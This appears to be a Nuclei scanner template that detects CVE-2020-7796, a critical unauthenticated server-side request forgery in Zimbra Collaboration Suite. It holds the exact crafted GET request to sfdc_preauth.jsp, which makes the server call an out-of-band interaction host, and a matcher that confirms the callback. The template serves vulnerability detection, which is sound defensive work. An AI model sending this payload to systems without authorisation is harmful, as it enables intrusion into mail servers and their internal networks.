id: zimbra-preauth-ssrf

info:
  name: Zimbra Collaboration Suite - Server-Side Request Forgery
  author: gy741
  severity: critical
  description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
  reference:
    - https://www.adminxe.com/2183.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7796
    - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7796
    cwe-id: CWE-918
  tags: zimbra,ssrf,oast

requests:
  - raw:
      - |
        GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# Enhanced by mp on 2022/06/03
